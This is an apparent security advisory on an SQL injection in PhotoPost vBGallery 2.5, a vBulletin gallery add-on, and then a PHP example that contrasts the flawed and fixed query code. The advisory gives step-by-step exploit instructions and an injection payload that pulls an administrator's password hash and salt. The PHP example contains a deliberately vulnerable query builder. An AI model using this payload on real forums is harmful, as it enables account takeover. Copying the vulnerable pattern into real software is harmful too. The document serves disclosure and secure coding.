PhotoPost vBGallery 2.5 SQL Injection

30 Mar 2010. Reported by Andreas Kirbach. Source: packetstorm (packetstormsecurity.com)

PhotoPost vBGallery 2.5 SQL Injection allows unauthorized access to an administrator account's password hash and salt.

Product Information
-------------------
PhotoPost vBGallery is a popular commercial Image Gallery add-on for
vBulletin which is being developed by All Enthusiasts, Inc.
http://www.photopost.com
  
Description
-----------
PhotoPost vBGallery 2.5 allows the user to modify gallery settings for
his profile page if the function is enabled and the user has permission
to do so.
  
For this function to work, PhotoPost vBGallery adds a plug-in to the
profile_start hook.
The PHP code in this plug-in displays a form which allows the user to
customize the settings and save them into the database.
  
The SQL constructed for action updatevbgallery contains variables
that are not properly sanitized:

The POST variables profile_include and profile_exclude are treated as
HTML-safe strings and used in the SQL directly, although only
comma-separated integers are valid.
POST variable profile_showimg is also processed as an HTML-safe string,
although only integer values are valid.
POST variable profile_column is also processed as an HTML-safe string but
is not made SQL-safe.
POST variable array profile_imagebitdisplay is stored without
being made SQL-safe.
  
Versions  
---------  
Affected Version(s): 2.5  
Not affected Versions: Versions prior to 2.5  
  
Exploit
-------
This exploit shows how to get the password hash and salt of an
administrator account.
  
Preconditions
- No table prefix is being used
- The gallery functions are enabled for member profiles
- User-ID of an administrator account is 1
- The vBulletin database error page is unmodified and shows the executed
SQL as an HTML comment
- The account being used has permission to modify gallery profile settings
  
1) Go to <forumroot>/profile.php?do=vbgalleryprofile
2) Using Firebug, remove the maxlength attribute for the input labeled
Exclude Categories
3) Enter
', profile_exclude = (SELECT CONCAT(password, '|||', salt) FROM user
WHERE userid = 1), profile_include = '
into the input field Exclude Categories
4) Submit the form
5) Access your own profile page (<forumroot>/member.php?u=X)
6) The HTML source of the database error page will contain an HTML
comment like
---  
Invalid SQL:  
  
SELECT imageid, images.title, images.description, filename,   
thumbname, originalname, extension, images.catid ,images.userid,   
images.username, images.description, images.dateline, images.views,   
posts ,width, height, originalwidth, originalheight ,filesize,   
originalfilesize, images.lastpostdateline, images.lastpostuserid,   
images.lastpostusername, votenum, votetotal, categories.title AS cattitle  
FROM ppgal_images AS images  
LEFT JOIN ppgal_categories AS categories USING (catid)  
WHERE valid = 1 AND images.userid = 5  
  
  
AND images.catid NOT IN (abcdef12344777148822d7530f089fbd|||.%&/)  
AND images.thumbname != ''  
---  
The string after "AND images.catid NOT IN (" is the password hash and
salt of user ID 1, separated by |||.
  
Suggested Fixes
---------------
Properly sanitize user input and run strings through $db->escape_string()
before saving them into the database.
  
Patches
-------
All Enthusiasts, Inc. was informed about this vulnerability on
2010/03/17 but has not yet released a patch.
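To make the defect described under Description and the remedy under Suggested Fixes concrete, the following PHP is an added example; it is not code from the advisory, from PhotoPost vBGallery or from vBulletin. It places the vulnerable pattern (request values made HTML-safe but not SQL-safe) next to a hardened version that validates the integer-only settings and escapes the one free-text string. The field names profile_include, profile_exclude, profile_showimg, profile_column and profile_imagebitdisplay come from the advisory; the table name ppgal_userprofile, the escape_string() stand-in for $db->escape_string(), the ENT_COMPAT model of the HTML-safe filter and the storage format chosen for profile_imagebitdisplay are assumptions.

```php
<?php
// Added example, not code from the advisory, PhotoPost or vBulletin.
// Field names follow the advisory; the table name ppgal_userprofile and the
// storage format of profile_imagebitdisplay are assumptions.

// Stand-in for vBulletin's $db->escape_string(): MySQL-style escaping of the
// characters that can terminate or alter a quoted literal. No real DB here.
function escape_string(string $s): string
{
    return addcslashes($s, "\0\n\r\\'\"\x1a");
}

// Vulnerable pattern from the advisory: the value is made "HTML-safe" but not
// SQL-safe. ENT_COMPAT models a filter that leaves single quotes untouched, so
// a quote in the input closes the literal and the remainder is parsed as SQL.
function build_update_vulnerable(array $post, int $userid): string
{
    $include = htmlspecialchars((string)($post['profile_include'] ?? ''), ENT_COMPAT);
    $exclude = htmlspecialchars((string)($post['profile_exclude'] ?? ''), ENT_COMPAT);
    $showimg = htmlspecialchars((string)($post['profile_showimg'] ?? '0'), ENT_COMPAT);
    return "UPDATE ppgal_userprofile SET profile_include = '$include', "
         . "profile_exclude = '$exclude', profile_showimg = '$showimg' "
         . "WHERE userid = $userid";
}

// Only comma-separated integers are valid for the category lists, so reject
// anything else outright instead of trying to escape it. Empty means "none".
function parse_int_list(string $raw): ?array
{
    if ($raw === '') {
        return [];
    }
    if (!preg_match('/^\d+(,\d+)*$/', $raw)) {
        return null;
    }
    return array_map('intval', explode(',', $raw));
}

// Hardened version: type-validate the integer settings, escape the one
// free-text string, and never let raw request data reach the statement.
function build_update_hardened(array $post, int $userid): ?string
{
    $include = parse_int_list((string)($post['profile_include'] ?? ''));
    $exclude = parse_int_list((string)($post['profile_exclude'] ?? ''));
    if ($include === null || $exclude === null) {
        return null;                                   // reject the request; do not "fix up" the input
    }
    $showimg = (int)($post['profile_showimg'] ?? 0);   // integer-only setting
    // profile_column: the advisory only says it was not made SQL-safe, so escape it.
    $column = escape_string((string)($post['profile_column'] ?? ''));
    // profile_imagebitdisplay arrives as an array; each element is cast to int and
    // the list is stored as comma-separated integers (storage format is assumed).
    $bits = implode(',', array_map('intval', (array)($post['profile_imagebitdisplay'] ?? [])));

    return sprintf(
        "UPDATE ppgal_userprofile SET profile_include = '%s', profile_exclude = '%s', "
        . "profile_showimg = %d, profile_column = '%s', profile_imagebitdisplay = '%s' "
        . "WHERE userid = %d",
        implode(',', $include), implode(',', $exclude), $showimg, $column, $bits, $userid
    );
}

// Constructed request (sample data, not captured traffic): the exclude list
// carries a stray quote and SQL text instead of a list of category IDs.
$post = [
    'profile_include'         => '3,7',
    'profile_exclude'         => "2', profile_include = '",
    'profile_showimg'         => '1',
    'profile_column'          => "it's",
    'profile_imagebitdisplay' => ['1', '4'],
];

echo build_update_vulnerable($post, 5), "\n";

$sql = build_update_hardened($post, 5);
echo $sql === null ? "rejected: profile_exclude is not a comma-separated integer list\n" : $sql . "\n";
```

Run it with php-cli. In the vulnerable statement the single quote in profile_exclude survives the HTML-safe filter and closes the string literal, which is the condition the advisory's step 3 relies on; the hardened builder refuses the same request before any SQL is assembled, because the category lists fail the integer-list check. The design point is that escaping is the fallback for genuinely free-text fields, while fields that can only hold integers should be validated and cast, so a quote never has a place to land.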
